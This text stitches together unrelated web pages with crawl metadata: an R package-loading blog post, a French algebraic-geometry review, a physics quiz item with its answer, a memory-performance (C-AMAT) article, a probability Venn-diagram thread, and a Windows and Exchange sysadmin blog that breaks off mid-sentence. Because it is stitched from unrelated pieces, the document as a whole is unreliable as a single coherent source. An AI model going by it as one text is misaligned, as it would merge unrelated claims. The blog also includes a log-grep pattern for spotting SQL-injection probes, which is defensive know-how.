Want to share your content on R-bloggers? click here if you have a blog, or here if you don't. Using R snippets written by other developers can be unendingly maddening.  There are a variety of reasons for this, most of which boil down to a simple issue: most code is written such that a system must be configured in precisely the same way as the code’s author’s machine.  Anyone who’s ever seen a line like this: read.xls("C:/Users/MCaine/code/R/projecteuler/someotherdirectory/data.xls") knows what I am talking about. To use this without modification, you must: 1. Use Windows. 2. Have exactly the directory structure specified by the address (which is highly unlikely, unless you were the one who wrote it). 3. Have the gdata package installed and included in the project (which is both unlikely, and difficult to know without already being a regular user of the package). You can see how it would already be easier to just change the address to whatever works on your machine.  For this problem, I’m afraid I have no easy solution.  My preferred approach is to provide URLs, so that the directory structure doesn’t depend on the user’s machine, but this obviously provides its own host of problems.  However, I can take aim at this third issue. Package management in R is a silly thing, both because it is so easy and it is so easy to screw up.  Most people who write R write it like analysts: they write exactly enough code the get the desired output on their machine, and leave it at that.  When such R Code is made public, it tends to be very difficult to use it in actual replication.  But there are some simple ways around that. Consider this gist.  Instead of calling library(package), which fails if the library is not installed on the user’s machine, getPackage(package) invokes that safer require function, which doesn’t fail when the local machine doesn’t have the requisite package.  Instead, it returns false, which triggers the R script to download the package from the user’s default CRAN mirror and then bring it into the user’s working session.  If anything goes wrong, then it throws an error, but it won’t do that for anything silly like the user not having a package that is a mere two commands away. One note: because of the esoteric manner in which R treats package names, you must pass this function a string and not a package name.  If you’re not on top of your type-know-how, this means that getPackage(plyr) will fail.  You should instead write getPackage("plyr"). Now, I’m sure there’s a very good reason hidden deep in R’s core that this is a bad way to do things, but it has saved me time and headaches.  R is recognized as a difficult language both within the programming world (for its strange inconsistencies and its non-grown-up hacker culture), and outside of it (because programming is hard).  I wish that more R functions were written in the defensive way to decrease the cognitive barriers to using R for the latter group.
2022-01-26 23:04:17
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5485659837722778, "perplexity": 1297.1646632855209}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320305006.68/warc/CC-MAIN-20220126222652-20220127012652-00545.warc.gz"}
https://zbmath.org/?q=an:0585.14008
## Variétés polaires. II: Multiplicités polaires, sections planes et conditions de Whitney. (Polar varieties. II: Polar multiplicities, plane sections and the Whitney conditions).(French)Zbl 0585.14008 Algebraic geometry, Proc. int. Conf., La Rábida/Spain 1981, Lect. Notes Math. 961, 314-491 (1982). [For the entire collection see Zbl 0487.00004. For part I see Inst. Élie Cartan, Univ. Nancy I 3, 33-55 (1981; Zbl 0572.14002).] Let (X,x) be a germ of a reduced analytic space of (pure) dimension d. A collection of d natural numbers (polar multiplicities) $M^*_{X,x}=\{m_ x(X),\quad m_ x(P_ 1(X)),...,m_ x(P_{d- 1}(X))\}$ corresponds to it. Here $$P_ k(X)$$ is the (local) polar variety in general position of codimension k for the germ X, $$m_ x$$ the multiplicity in the point x. The local polar variety $$P_ k(X)$$ of codimension k can be defined in the following way. Let $$(X,x)\to ({\mathbb{C}}^ N,0)$$ be an imbedding of the germ (X,x) into a complex linear space, p: ($${\mathbb{C}}^ N,0)\to ({\mathbb{C}}^{d-k+1},0)$$ be the projection along a subspace L in general position of dimension $$N-d+k-1$$. The polar variety $$P_ k(x)$$ is the closure in X for the set of critical points of the restriction of the projection p to the set $$X^ 0$$ of non-singular points of the germ X. It is either empty or an analytic supspace of pure codimension k in X. Its multiplicity in the point x is denoted by $$m_ x(P_ k(X))$$. It does not depend on the space L along which the projection is realized if L is chosen in general position. We have $$X=P_ 0(X)$$, i.e., $$m_ x(X)=m_ x(P_ 0(x))$$. - Main result of the paper under review: Theorem: Let X be a reduced, complex-analytic space of pure dimension d, Y be a non-singular analytic subspace of the space X, $$0\in Y$$. The following conditions are equivalent: (1) the pair $$(X^ 0,Y)$$ satisfies the Whitney conditions (a),(b) in 0 $$(X^ 0$$ is the set of non-singular points of the space X); (2) the collection of polar multiplicities $$M^*_{X,y} (y\in Y)$$ is constant for all $$y\in Y$$ of a neighbourhood of the point 0. Thus, the pair $$(X^ 0,Y)$$ does not satisfy the Whitney conditions in the point 0 if and only if the multiplicity of one of the local polar varieties $$P_ k(X)$$ of general form is not constant in a neighbourhood of 0 on Y. The fact, that the collections of polar multiplicities $$M^*_{X,x}$$ can be (in a certain sense) computed by topological methods while the immediate checking of fulfilment of the Whitney conditions requires analytical computations, accounts for the significance of this result. ### MSC: 14B05 Singularities in algebraic geometry 13H15 Multiplicity theory and related topics 32Sxx Complex singularities ### Citations: Zbl 0487.00004; Zbl 0572.14002
2022-08-12 13:03:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8042798638343811, "perplexity": 462.99511752647163}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571692.3/warc/CC-MAIN-20220812105810-20220812135810-00644.warc.gz"}
http://clay6.com/qa/14627/in-moseley-s-law-sqrt-v-a-z-b-the-values-of-the-screening-constant-for-k-se
# In moseley's law $\sqrt v=a(z-b)$, the values of the screening constant for K-series and L-series of X-rays are respectively $\begin {array} {1 1} (1)\;1,6.4 & \quad (2)\;1,4 \\ (3)\;4,6 & \quad (4)\;2,4 \end {array}$ (1) 1,6.4
2018-01-16 13:20:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8772897124290466, "perplexity": 5679.611354893483}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886436.25/warc/CC-MAIN-20180116125134-20180116145134-00137.warc.gz"}
http://www.cs.iit.edu/~scs/home/C-AMAT/c-amat-3.html
We're gradually importing our scientific contents in French. Please forgive the visual glitches that may result from the operation. Concurrent-AMAT: a mathematical model for Big Data access By   |  May 12, 2014 Fig. 1 provides a demonstration example to illustrate the “pure miss” and hit cycle concept. It contains five different memory accesses, and each access contains 3 cycles for cache hit operations. If it is a miss, additional miss penalty cycles will be required, and the number of miss penalty cycles is uncertain. Access 1, 2, and 5 are hit accesses; Access 3 and 4 are miss accesses. Access 3 has a 3-cycle miss penalty; Access 4 has only a 1-cycle miss penalty. When considering the access concurrency, only Access 3 contains 2 pure miss cycles. Though Access 4 has 1 miss cycle, this cycle is not a pure miss cycle, because it overlaps with the hit cycles of Access 5. Therefore, the (pure) miss rate of the five accesses is 0.2, according to our new definition of concurrent (pure) miss rate, instead of 0.4 for the conventional non-concurrent version. The reason for bypass misses whose cycles are overlapping with hit accesses is that this kind of miss accesses will not cause processor stall; the processor can continue processing with the hit accesses. According to Eq. 2, C-AMAT is 8 cycles out of 5 accesses or 1.6 cycle per access; whereas by Eq. 1 AMAT is 3 + 0.4 × 2 or 3.8 cycle per access. The difference between C-AMAT and AMAT is the contribution of concurrent data access. In this example, concurrency has doubled memory performance. Fig. 1 - A C-AMAT Example. Fig. 2 shows a detecting structure of C-AMAT. The Hit Concurrency Detector (HCD) counts the total hit cycles and records each hit phase in order to calculate the average hit concurrency. The HCD also tells the Miss Concurrency Detector (MCD) whether a current cycle has a hit access or not. The MCD is a monitor unit which counts the total number of pure miss cycles and records each pure miss phase in order to calculate the average miss concurrency, pure miss rate, and pure miss penalty. With the information provided by the HCD, the MCD is able to tell whether a cycle is a pure miss cycle, and whether a miss is pure miss. With the miss information, the pure miss rate and average pure miss penalty can be calculated. These parameters can be measured at each layer of a memory hierarchy. Therefore, C-AMAT also can be measured at each layer of a memory hierarchy. Fig. 2 - C-AMAT Detecting Structure. Please notice that the contribution of C-AMAT is not its measurement. The measurement can be obtained directly through APC [6]. The measurement of C-AMAT does not depend on the measurement of its five parameters. The value of the parameters is in performance analysis and optimization. The indispensable contribution of C-AMAT is that it gives a unified formulation to capture the joint performance impact of locality and concurrency. C-AMAT contains AMAT as a special case where memory concurrency does not exist, and provides a mean to evaluate and optimize the five performance parameters, individually or in combination. It provides a tool for design optimization. Readers who are familiar with AMAT may recall that the average miss penalty of AMAT can be extended recursively to the next layer of a memory hierarchy. This recursiveness is true for C-AMAT as well. Eq. 3 shows the recurrence relation of C-AMAT1 and C-AMAT2. That is extending C-AMAT from the L1 level to L2 level. Please notice here that we have introduced a new parameter, ɳ1, and the impact of C-AMAT2 toward the final C-AMAT1 has been trimmed by pMR1 and ɳ1. pMR1 x ɳ1 is the concurrency contribution in reducing average memory (access) delay at the L1 level. ɳ1 only has one new parameter, Cm, which is the miss concurrency. Please notice that we use CM (capital M) to represent the pure concurrent misses and use Cm (little m) to represent concurrent misses. ɳ1 is a measureable parameter and has physical meanings. The number of misses occurred on L2 is Cm and the number of misses that matters to the L1 performance is CM. Similarly, the argument applies to pAMP and AMP. In a similar fashion as Eq. 3, C-AMAT can be extended to the next layer of the memory hierarchy. Eq. 3 – $C{-}AMAT_{1} = \frac{H_{1}}{C_{H_{1}}} + pMR_{1} \times ɳ_{1} \times C{-}AMAT_{2}$ where $C{-}AMAT_{1} = \frac{H_{1}}{C_{H_{1}}} + pMR_{1} \times \frac{pAMP_{1}}{C_{M_{ 1}}}$ , $C{-}AMAT_{2} = \frac{H_{2}}{C_{H_{2}}} + pMR_{2} \times \frac{pAMP_{2}}{C_{M_{ 2}}}$ , $ɳ_{1} = \frac{pAMP_{1}}{AMP_{1}} \times \frac{C_{m{1}}}{C_{M{1}}}$ APC is a performance metric and its value is the inverse of C-AMAT [1]. The correctness and measurement of APC are well studied in [6]. Therefore, the correctness of the measurement of C-AMAT is guaranteed. At the first look, APC (Access Per Cycle) seems to be very similar to the well-known metric IPC (Instruction Per Cycle). But, in fact, the cycle used in APC is completely different with the cycle used in IPC. They are different in definitions, and different in measurement. In APC, the cycles are memory active cycles. They are not CPU cycles, as used in IPC. So APC can also be named as APMAC (Access Per Memory Active Cycle). Also APC uses the overlapping mode to count memory access cycles. That is, if two or more data accesses occur at the same time, the cycle only increases by one. The two differences between APC and IPC are crucial. The replacement of CPU cycle with memory active cycle separates the APC measurement with the CPU performance. The separation makes applying APC on each level of a multi-level hierarchical memory system possible, and leads to a better understanding of the matching between computing systems and memory systems. This replacement represents the shift from the traditional compute-centric thinking to a data-centric thinking in studying memory systems. Overlapping is the concept of parallel data access and overlapping cycles is a measurement of parallel data accesses. C-AMAT introduces the concept of parallel memory systems and provides a tool for evaluating and designing parallel memory systems. C-AMAT has opened a new door to computer hardware development and algorithm design. C-AMAT is a model calling for rethinking of memory and computing system design. It is simple and effective. It has a unified mathematical expression considering both data locality and concurrency, and is based on a rigorous analytical and mathematical proof. C-AMAT makes the contribution of concurrent data accesses toward the overall system performance measureable, and therefore provides a mean to optimize concurrent data accesses. C-AMAT calls for a rethinking of the design of computer architectures and algorithms to consider memory concurrency and to consider the interaction between memory concurrency and locality. C-AMAT will make a noticeable impact on the next generation of computers and their associated software development and algorithm design. [Acknowledgement] C-AMAT is a joint work of Dr. Dawei Wang and the author, and the application of C-AMAT is a joint work of Dr. Yuhang Liu and the author. Dr. Yuhang Liu provided valuable help in writing this article. Dr. Xian-He Sun is a distinguished professor of Computer Science and the Chairman of the Department of Computer Science at Illinois Institute of Technology (IIT). He is an IEEE fellow, a guest faculty in the Mathematics and Computer Science Division at Argonne National Laboratory, and the director of the Scalable Computing Software laboratory at IIT. He is an editor of eight international professional journals, and has served and is serving as the chairman or a member of the program committee for numerous international conferences and workshops. His current research interests include parallel and distributed processing, memory and I/O systems, software systems for Big Data applications, and performance evaluation and optimization. He has published over two hundred research articles in the field of computer science and communication. Based on Google Scholar, his works have been referenced 2,694 times during the last five years since 2009 (1/16/2014 data). <123> More around this topic...
2017-12-14 02:24:03
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3536801040172577, "perplexity": 1551.7998443610943}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948537139.36/warc/CC-MAIN-20171214020144-20171214040144-00275.warc.gz"}
http://mathhelpforum.com/statistics/166025-venn-diagrams.html
1. ## Venn Diagrams Q) Create a venn diagram using this information: P(A)=0.4, P(B)=0.2, P(AnC)=0.04, P(BuC)=0.44, B & C are independent and A & B are mutually exclusive. if possible could someone please draw the venn diagram with an explanation the main trouble im having is where to use the fact that B & C are independent. thanks 2. $P(B\cap C) = P(B)P(C)=.2P(C)$ (by indeoendence) $P(B\cup C) = P(B)+P(C)-P(B\cap C)$ $.44= .2+P(C)-.2P(C)$ $.44= .2+.8P(C)$ $.24= .8P(C)$ $P(C)=.3$ 3. Hello, wahhdoe! $\text{Create a Venn diagram using this information:}$ . . $P(A)=0.4,\;P(B)=0.2,\;P(A \cap C)=0.04,\;P(B \cup C)=0.44$ . . $B\text{ and }C\text{ are independent, and }A\text{ and }B\text{ are mutually exclusive.}$ DrSteve did an excellent job! He found that: . $P(C) = 0.3$ Since $\,B$ and $\,C$ are independent: . . $P(B \cap C) \:=\: P(B)\cdot P(C) \:=\:(0.2)(0.3) \:=\:0.06$ The Venn diagram looks like this: Code: *-----------------------------------------------* | | | *---------------* *---------------* | | | A | | B | | | | 0.36 | | 0.14 | | | | | | | | | | *-------+-------+-------* | | | | | 0.04 | | 0.06 | | | | | | | | | | | | *-------+-------* *-------+-------* | | | 0.2 | | | | C | | | 0.2 *-----------------------* | | | *-----------------------------------------------*
2013-12-08 15:53:29
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 13, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2938789129257202, "perplexity": 943.7697844787575}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-48/segments/1386163066152/warc/CC-MAIN-20131204131746-00031-ip-10-33-133-15.ec2.internal.warc.gz"}
http://www.daknetworks.com/index.php/blog
daknetworks.com You are here: Examine httpd access logs I spend a large amount of time defending from spam attacks and sql injection attacks. I can analyze the httpd logs with the following: grep schem ./access_log* |cut -d ' ' -f 2 |uniq -c |sort -n • The 'grep' command searches for the word schema as in information_schema. No real sql query searches for this. It is always an sql hacking attempt. • The files we are searching is 'access_log*' which means search through all the access logs that we have. For me, that is usually around 4 months of data. That is a fairly good data set. • The 'cut' command chunks up the data. The '-d' part tells how to chunck the data; by a space character. The '-f 2' tells what data to collect; the second item in each line. • The 'uniq -c' tells to count each unique item. • The 'sort -n' sorts them least to greatest. WSUS Setup WSUS setup. I give credit when credit is due. This has been covered very well in the follow video: Export Contacts from Exchange 2013 Export Contacts from mailbox in Exchange 2013 For an OU apcupsd apcupsd runs ups's. It's rather simple: RUN APCUPSD Running apcupsd isn't hard: • -click START > PROGRAMS > APCUPSD > START-APCUPSD This will shut your computer down when the battery is nearing end of power. TEST BATTERY WITH APCUPSD One of my favorite parts is that apcupsd has some options to test a battery and set some battery options. Here's how: • -first, stop apcupsd by: click START > PROGRAMS > APCUPSD > STOP-APCUPSD • -you may have to stop the APCUPSD service: click START > RUN > SERVICES.MSC. Find APCUPSD in the list. Click STOP. • -cd to: C:\apcupsd\bin • -type apcaccess.exe to see stats • -type apctest.exe to test/configure battery PERFORM CALIBRATION Most of the trouble comes from performing calibration to the unit. This can be done in 2 different ways: • -with APCTEST. • -with a manual calibration. A manual calibration is basically, to put at least a 30% load on the unit. Unplug the unit and let it drain to zero. Plug the unit back in. NOTES: -you cannot run apctest.exe with apcupsd running. -click here for manual calibration docs as it gets into more detail than I care to display: http://www.apcupsd.com/manual/manual.html#manual-runtime-calibration FileMaker on a cloud Virtual Machine I've had a interest in FileMaker for decades. Nothing else seems to fit the custom software solution like FMP does. So putting the FMP Server on a cloud VM was a information worth pursuing. The costs from various places range like this (obscured to avoid any love letters): SOURCE MONTHLY-COST TOTAL COST aws 50 600 lsn 50 600 host-1 71 852 host-2 79 948 host-3 99 1188 host-4 100 1200 host-5 130 1560 host-6 130 1560 host-7 140 1680 host-8 150 1800 host-9 150 1800 As outgoing Rackspace CEO recently referenced, it is hard to beat a disrupter like AWS. You're going to have to join them. In the end, I decided to go with LSN. They have a CloudStack running and I can rely on their support if I'm ever in a jam. NOTES: http://www.soliantconsulting.com/blog/2016/01/filemaker-server-on-amazon-web-services The Quick and Dirty Windows 10 Fix 1- fix Windows Update Use the Windows Update Troubleshooter here: https://support.microsoft.com/en-us/help/10164/fix-windows-update-errors 2- fix Windows Image -type: DISM.exe /Online /Cleanup-image /Restorehealth 3- fix Windows System File -type: sfc /scannow 4- fix Windows Apps: -type: Get-AppXPackage | Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"} Exchange 2013 Error: The Global Catalog Verification failed Exchange 2013 Error: The global catalog verification failed Working on Exchange 2013 and adding permissions to a mailbox, I get: Active Directory operation failed on exchange.domain.tld. This error could have been caused by user input or by information: The global catalog verification failed. The global catalog is not available or does not support the operation. Some part of the directory is currently not available. Active directory response: 000020E1: SvcErr: DSID-03200672, problem 5002 (UNAVAILABLE), data 0 Here's how to fix: • -delete the files in: C:\Users\administrator\AppData\Roaming\Microsoft\MMC • -re-run the command: Add-MailboxPermission foo.user -User foo.user2 -AccessRights FullAccess -InheritanceType All • set-mailbox foo.user -GrantSendOnBehalfTo foo.user1,foo.user2,foo.user3 That is all. The Trust Relationship Between This Workstation and the Primary Domain Has Failed The Trust Relationship Between This Workstation and the Domain Has Failed Just as a USER-ACCOUNT is an object in AD, a COMPUTER-ACCOUNT is an object in AD. This has a password but the password isn't working. Let's reset the password. • $credential = Get-Credential (enter the domain admin account when prompted) • -type: Reset-ComputerMachinePassword -Server ClosestDomainControllerNameHere -Credential$credential Test-ComputerSecureChannel Now, let's test the secure channel • -start > programs > powershell (as administrator) • -type: Test-ComputerSecureChannel It will come back either TRUE or FALSE. If it's false, let's try and repair it. • -type: Test-ComputerSecureChannel -repair • -if that didn't work, try: Test-ComputerSecureChannel -Repair -Credential Netdom An older way of fixing this was with NETDOM I found out the relationship failed by: • -right-click a folder that is a shared folder for a group on the domain. • -click properties • -click security tab (at the top) • -click advanced button (at the bottom) • -effective-access tab • -select a user • -click VIEW-EFFECTIVE-ACCESS ForensiT User Profile Wizard For Entire Location ForensiT User Profile Wizard is a great tool when you are migrating from domainold.tld to domainnew.tld. The free version is a manual process but the corporate version is an automated process that helped migrate an entire office. Cost The cost is around $2 USD per computer. So for 100 computers, the cost is$200. Priced correctly on the time you will save. Installation A license file will be emailed to you. Save the file in the location: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\ Run The Wizard Running the wizard will create a CONFIG file. The config file is an xml file that is editable by any text editor. The options are pretty standard. You will be able to get through them. Very simple, nothing complex. I think the only gotchas are: -reboot without notice (as you'll be doing this off-hours). -create a SINGLE-DEPLOYMENT-FILE. When finished. It will save the CONFIG file in: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\ Edit the Config File Edit the CONFIG file at C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\. Run the PROFWIZ.EXE again to edit the file you just created. You need to edit a few items to get it to work the way we want it to. Namely, the following: <! -- Corporate Edition Settings -- > < Silent > True < NoMigrate > False < NoReboot > False < MachineLookupFile >\\server\share\migrate-pc-file.csv < Log > \\sever\share\Migrate.Log < ScriptLocation > \\server\share\Migrate.vbs (yes, change this even if it says not to. I find having the server share is more accomodating) <! -- Settings for migrating all profiles -- > < All > True <! -- Advanced Settings -- > < Persist > False < NoGUI > True < ProtocolPriority > LDAP < DC > \ \ britannic2.britannic.domainname.tld < ProfBatRetryLimit > 3 < ProfBatRetryDelay > 2 Most of the key/values are self explanitory. To choose which domain controller you want to join, the ProtocolPriority must be set to LDAP and the DC setting specifies the FQDN of the domain controller (make sure you precede with the "\\"). Create Migrate-PC.CSV File A .csv file needs to be created. Column A is the current computer name. Column B is the new computer name. If the names are the same then the computer name doesn't change. Save this file in \\server\share\migrate-pc-file.csv Save the single-deployment-file in the same location: \\server\share Deployment I used 3 ways to deploy. • -save it in:C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\ • -make sure you are still on the domainold.tld and logged in a users at domainold.tld • -reboot all the computers for a fresh start (use PDQ inventory if you need to do this automatically). • -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin) • -a cmd prompt opens • you should be at: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\ • -type: profbat.exe • -hit enter • -wait... It will give some feedback but not much. • -it will automatically go through all the computers in the .csv list, migrate all the profiles and join the new domain and reboot the computers. • -once rebooted, everyone can use their new login at newdomain.tld • -AWESOME! • -the logs should be at \\server\share • -each pc will have it's own migration log. • -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin) • -a cmd prompt opens • -type: profwiz.exe /COMPUTER computer-name-here • -hit enter • -you will see: > • -wait... It won't give any verbose information. • -soon it will go to a new line once finished and you will see: > > • -the logs are the place you indicated (which should be \\server\share\). 3-manually at admin workstation after domainnew.tld If for some reason, the pc's are joined to the domainnew.tld without the profiles being migrated, don't worry as it is pretty much the same process. The most important part is the first step: • -make sure you are on the domainnew.tld and logged into a user with domainnew.tld • -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin) • -a cmd prompt opens • -type: profwiz.exe /COMPUTER computer-name-here • -hit enter • -you will see: > • -wait... It won't give any verbose information. • -soon it will go to a new line once finished and you will see: > > • -the logs are the place you indicated (which should be \\server\share\). 4- manually at the client computer: • -save the profwiz.exe, profwiz.config, migrate.exe, migrate.vbs at the share: \\server\share\ • -edit the profwiz.config • -change: <GUI> True • -save • -run: migrate.vbs • -it should show the progress and migrate all the profiles over. • -reboot the computer. 5- automatically via logonscript • -save the profwiz.exe, profwiz.config, migrate.exe, migrate.vbs at the share: \\server\share\ • -login to the client pc. It will begin the migrate process and skip if has already been run (of course it won't be referenced once the computer is joined to the new domain). Final Thoughts That's it! That should handle all the scenarios that will work. Of course, there are many scenarios that will NOT work. Most of the errors will be trying to move a client-pc on domainold.tld by using an admin-workstation already joined to domainnew.tld (and logged into domainnew.tld user). Or vice-versa. If you are making changes, the client-pc and the admin-pc must be on the same domain (at least for it to be easy). In any event, in all scenarios I did not visit a single client pc. Everything worked with a little thinking. This should be built into Windows Server. NOTES: For the curious... Yes, it is possible to have 2 domains on the same network subnet at the same time. But there can only be one DHCP and both domains should reference the other in the DNS -> FORWARD LOOKUP ZONES. Simply add the other domain and IP address of the other domian server. Null result from socket | Watchguard, Mimecast and Office365 Watchguard, Mimecast and Office365 Couldn't get email from certain outside domains. Further investigation revealed that this is only happening from domains hosted at Office365. The error message in Mimecast is "Null result from socket." This means that there is no response from the internal email server when Mimecast tries to deliver the message. That means it is being blocked by the WatchGuard. So WatchGuard is blocking anything where the header is too large. You can see above the "Maximum email header size" is at 20,000 bytes. We set it to: 21000. Save > Push-Config That did it! NOTES: http://www.watchguard.com/help/docs/wsm/xtm_11/en-us/content/en-us/proxies/smtp/proxy_smtp_gen_settings_c.html Set Logon Script For Everyone in Domain With Powershell | Set Logon Script For Everyone in OU With Powershell Set Logon Script For Everyone in Domain | Set Logon Script For Everyone in OU Good morning class! Today, let's set the LOGON SCRIPT for everyone in a domain or in an OU: To clear the value: To set the value: Or for a single user: What About More? I Want More! Like the Home Folder? Now I already know what you are going to ask... "Can I set the HOME FOLDER as well?" YES!!! It's a little complicated so it is in another article here: http://www.daknetworks.com/index.php/blog/390-how-to-setup-home-drives-home-folders-and-login-scripts How To Setup Home Drives, Home Folders and Login Scripts How To Setup Home Drives, Home Folders and Login Scripts Automatically Good morning class! This isn't duplicate content. This is valuable! I don't want the HOME-DRIVES part of the other article lost. So here it is: • -setup a "users" folder on the server. • -share the folder as: users$• -set share-permissions to: EVERYONE=FULL-ACCESS. • -set ntfs-permissions > disable-inheritance. • -set ntfs-permissions: DOMAIN-USERS (or other sub-group is large domain) > this-folder-only = Traverse | Create-Folders • -set ntfs-permissions: CREATOR OWNER > Subfolders-and-files = Full-Control • -set ntfs-permissions: SYSTEM > this-folder-Subfolders-and-files = Full-Control • -set ntfs-permissions: DOMAIN-ADMINS > this-folder-Subfolders-and-files = Full-Control • -run powershell (as admin). • -to get the values, type: get-aduser foo.user -properties homedrive, homedirectory, scriptpath • -to clear the values, type: set-aduser foo.user -clear homedrive, homedirectory, scriptpath • -to set the values, type: set-aduser foo-user -homedrive Z -homedirectory \\<server-name>\users$\foo.user -scriptpath logonscriptfilenamehere We used to use %username% as a variable. But that doesn't work in powershell. However if you want to get same, it's a little long winded: • -type: $username = (get-aduser foo.user -properties samaccountname |foreach {$_.samaccountname }).ToString() • -type: set-aduser $username -homedrive Z -homedirectory \\<server-name>\users$\$username -scriptpath logonscriptfilenamehere$username should be left as is. The folder will automatically be created and named exactly as the username! Too bad it doesn't automatically create the folder permissions like the GUI does in AD. To set the permissions: • -type: icacls("\\<server-name>\users$\'$username'") /grant ("$username" + ':(OI)(CI)F') /T For an entire Domain or OU How about for the whole domain or for an OU. Forget the long-winded scripts you see plastered all over the internet: • -to get the values, type: get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" -properties homedrive, homedirectory, scriptpath |ft name, homedrive, homedirectory • -to clear the values, type: get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" |set-aduser -clear homedrive, homedirectory, scriptpath • -to set the values, type:$usernames = (get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" -properties samaccountname |foreach { $_.samaccountname }) foreach ($username in $usernames) {set-aduser$username -homedrive Z -homedirectory \\<server-name>\users\$username -scriptpath logonscriptname} • -to set the permissions, type:$userfolder = "\\<server-name>\users$\" foreach ($username in $usernames) {icacls ("$userfolder" + "$username") /grant ("$username" + ':(OI)(CI)F') /T} !!!Please double-check and triple-check to make sure you have the correct punctuation above. This can be a career-changing event if you get this wrong!!! NOTES: Hopefully, it is obvious that <location>, <users>, <file-name> and <domain-name> should be replace/adjusted/deleted/added with your values. https://windowsserveressentials.com/2012/10/29/powershell-make-it-do-something-useful/ Create Trust Between Two Domains I was going to write an article on how to create a trust relationship between two domains but 